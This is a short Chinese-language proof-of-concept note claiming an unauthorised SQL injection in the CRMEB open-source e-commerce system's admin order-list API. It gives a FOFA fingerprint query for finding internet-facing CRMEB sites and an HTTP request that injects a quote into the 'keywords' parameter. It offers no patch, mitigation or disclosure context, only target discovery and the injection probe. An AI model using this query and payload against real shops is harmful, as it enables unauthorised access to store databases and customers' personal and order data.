## CRMEB开源电商系统orderlist存在SQL注入漏洞

CRMEB开源电商系统存在未授权sql注入漏洞

## fofa

```
body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
```

## poc

```
P0ST /api/admin/system/store/order/list?keywords=1' HTTP/1.1
Host:
Content-Type:application/x-www-form-urlencoded
```